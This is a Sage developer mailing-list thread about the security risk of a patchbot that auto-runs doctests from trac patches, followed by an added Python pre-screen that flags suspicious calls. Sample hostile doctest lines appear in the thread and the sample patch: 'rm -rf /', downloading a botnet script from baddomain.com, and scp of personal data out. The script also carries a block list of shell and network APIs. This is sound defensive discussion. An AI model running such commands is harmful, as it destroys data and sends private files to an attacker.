On 2/15/12 12:59 PM, William Stein wrote:
On Wed, Feb 15, 2012 at 10:31 AM, kcrisman<[email protected]>  wrote:
expected behavior.

It does always time out. The regular doctests take 1300 seconds for
sandpile.py! I need to figure out what's going on there.

I think at this point manual intervention is required. Or was there
something else you were thinking it should do (because clearly you
were surprised, which isn't the intent).

Well, I wasn't *too* surprised. I guess I was hoping for everything to
work perfectly with no intervention. But it does seem to be working now,
with a longer timeout.


Some followup (#10702 notwithstanding):

So I tried out the patchbot. Seemed to work reasonably well at
first.

Then I came into my office this morning.  Computer was humming at a
VERY decent clip; I could not get the screen to appear, Ctrl-C did
nothing, nothing nothing nothing, but clearly very busy (testing,
perhaps).  I had to restart it manually.

Yikes!

I'm still worried -- what if some jerk posts a patch to trac that contains

    sage: os.system('rm -rf /')
    Got you!

I think a patch like the above is a very real possibility.  All that
would have to happen would be for one of the 500 trac accounts (which
sometimes have very dumb passwords) to be compromised, or for somebody
to get a trac account, and boom -- some users running a patchbot lose
everything.  That's not a pretty thought.


or

sage: email('SPAM MESSAGE')
hahaha

or

sage: os.system('wget ...') # download rootkit
pwned!

or

sage: os.system("wget http://baddomain.com/joinbotnet.sh")
sage: os.system("scp allyourpersonaldata.tar.gz baddomain.com")
sage: os.system("joinbotnet.sh")


I would definitely want this thing sandboxed as much as possible, preferably running on a virtual machine that is completely firewalled off from the net, except communication with the patch server.

Really, if you are running a patchbot, you are giving everyone in the world permission to execute arbitrary code as the patchbot user.

Jason
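Added example, not code from this thread or from the Sage patchbot: a pre-screen a patchbot operator could run over an incoming trac patch before the bot executes any of its doctests. It walks the unified diff, keeps only the doctest input lines the patch *adds* (`+    sage: ...`), and flags any that reach for shell, filesystem or network APIs that a doctest has no reason to call, so the patch is routed to a human instead of being auto-run. The function names (`screen_patch`, `is_safe_to_autorun`, `Finding`), the `SUSPICIOUS_CALLS` policy, and the sample patch are all assumptions constructed for the example; the real patchbot interface is not modeled. This is a tripwire, not a sandbox: it catches the careless or obvious case and complements, rather than replaces, running the bot in a firewalled VM with no access beyond the patch server.

```python
"""Pre-screen a trac patch before a patchbot runs its doctests.

Added example, not part of the sage-devel thread or of the patchbot itself.
"""
import re
from dataclasses import dataclass

# Hypothetical policy: calls a doctest should never need. Matching on the
# dotted name catches `os.system(` or `subprocess.call(` even when they are
# buried inside a longer expression.
SUSPICIOUS_CALLS = (
    r"\bos\.system\s*\(",
    r"\bos\.popen\s*\(",
    r"\bsubprocess\.",
    r"\bshutil\.rmtree\s*\(",
    r"\bos\.remove\s*\(",
    r"\bos\.unlink\s*\(",
    r"\beval\s*\(",
    r"\bexec\s*\(",
    r"\burllib",
    r"\bsocket\.",
)
SUSPICIOUS_RE = re.compile("|".join(SUSPICIOUS_CALLS))

# A doctest input line added by the patch: '+' from the diff, then the
# indented 'sage:' prompt that Sage doctests use.
ADDED_DOCTEST_RE = re.compile(r"^\+\s*sage:\s*(?P<code>.*)$")


@dataclass(frozen=True)
class Finding:
    path: str   # file the hunk belongs to (new-side name)
    line: int   # line number in the *new* version of the file
    code: str   # the doctest input that tripped the screen


def screen_patch(diff_text: str) -> list[Finding]:
    """Return every added doctest line that calls a suspicious API."""
    findings = []
    path = "<unknown>"
    new_line = 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            # '+++ b/sage/sandpile.py' -> 'sage/sandpile.py'
            path = raw[4:].strip()
            if path.startswith("b/"):
                path = path[2:]
            continue
        if raw.startswith("--- "):
            continue
        m = re.match(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@", raw)
        if m:
            new_line = int(m.group(1)) - 1   # next line is the hunk start
            continue
        if raw.startswith("-"):
            continue            # removed lines do not exist in the new file
        new_line += 1           # context and added lines both advance
        d = ADDED_DOCTEST_RE.match(raw)
        if d and SUSPICIOUS_RE.search(d.group("code")):
            findings.append(Finding(path, new_line, d.group("code").strip()))
    return findings


def is_safe_to_autorun(diff_text: str) -> bool:
    """True only when no added doctest line was flagged."""
    return not screen_patch(diff_text)


# Constructed sample patch (not a real trac patch): two harmless doctest
# lines plus the kind of line the thread is worried about.
SAMPLE_PATCH = """\
--- a/sage/sandpile.py
+++ b/sage/sandpile.py
@@ -10,3 +10,7 @@ class Sandpile:
     EXAMPLES::

+        sage: S = Sandpile(graphs.CycleGraph(4))
+        sage: S.is_stable()
+        True
+        sage: os.system('rm -rf /')
         sage: S.num_verts()
"""

if __name__ == "__main__":
    for f in screen_patch(SAMPLE_PATCH):
        print(f"{f.path}:{f.line}: refusing to auto-run: {f.code}")
    print("auto-run allowed:", is_safe_to_autorun(SAMPLE_PATCH))
```

Running the module on the constructed patch reports `sage/sandpile.py:15` and refuses the automatic run; a patch whose added doctests stay within ordinary Sage calls passes through. Because the screen only looks at added `sage:` lines, it says nothing about what the patched library code itself does when imported, which is exactly why the VM and firewall are still needed.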
